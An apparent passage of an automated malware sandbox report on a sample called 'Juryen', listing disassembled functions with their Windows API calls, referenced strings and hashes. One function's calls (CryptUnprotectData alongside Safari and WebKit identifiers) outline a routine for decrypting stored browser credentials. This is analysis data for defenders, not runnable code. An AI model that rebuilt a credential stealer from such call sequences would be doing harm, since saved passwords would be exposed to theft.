                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                    Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                    • Opcode Fuzzy Hash: 3d8146a08a3d9ec2c9d37e6451c05be40f611b90597bfd58a2ee9084cce88e6e
                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                    Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                    • Opcode Fuzzy Hash: 35a61e7d12dbc562cacc7126c2682e24eeb9e54846c2fecb7db0f1f678c69579
                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                    Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: c04c0335ba9332e1d7a11915a44761c0e0363b535bb0446cda30cb285f4c8f6b
                                                                    • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                    • Opcode Fuzzy Hash: c04c0335ba9332e1d7a11915a44761c0e0363b535bb0446cda30cb285f4c8f6b
                                                                    • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                    Non-executed Functions

                                                                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                    • String ID:
                                                                    • API String ID: 3604893535-0
                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                    • API String ID: 2780580303-317687271
                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                    • String ID:
                                                                    • API String ID: 1213725291-0
                                                                    • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                    • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                    • free.MSVCRT ref: 00418370
                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                    • String ID: OsError 0x%x (%u)
                                                                    • API String ID: 2360000266-2664311388
                                                                    • Opcode ID: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                    • Opcode Fuzzy Hash: 10f246e2d2747b91fcb32a2333c1ab22a3afbcb686d449b36d250b01fe0f6cf6
                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                    • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: NtdllProc_Window
                                                                    • String ID:
                                                                    • API String ID: 4255912815-0
                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • memset.MSVCRT ref: 0040265F
                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                    • API String ID: 2929817778-1134094380
                                                                    • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                    • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                    • API String ID: 2787044678-1921111777
                                                                    • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                    • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                    • GetDC.USER32 ref: 004140E3
                                                                    • wcslen.MSVCRT ref: 00414123
                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                    • String ID: %s:$EDIT$STATIC
                                                                    • API String ID: 2080319088-3046471546
                                                                    • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                    • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                    • memset.MSVCRT ref: 00413292
                                                                    • memset.MSVCRT ref: 004132B4
                                                                    • memset.MSVCRT ref: 004132CD
                                                                    • memset.MSVCRT ref: 004132E1
                                                                    • memset.MSVCRT ref: 004132FB
                                                                    • memset.MSVCRT ref: 00413310
                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                    • memset.MSVCRT ref: 004133C0
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                    Strings
                                                                    • {Unknown}, xrefs: 004132A6
                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                    • API String ID: 4111938811-1819279800
                                                                    • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                    • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                    • String ID:
                                                                    • API String ID: 829165378-0
                                                                    • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                    • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
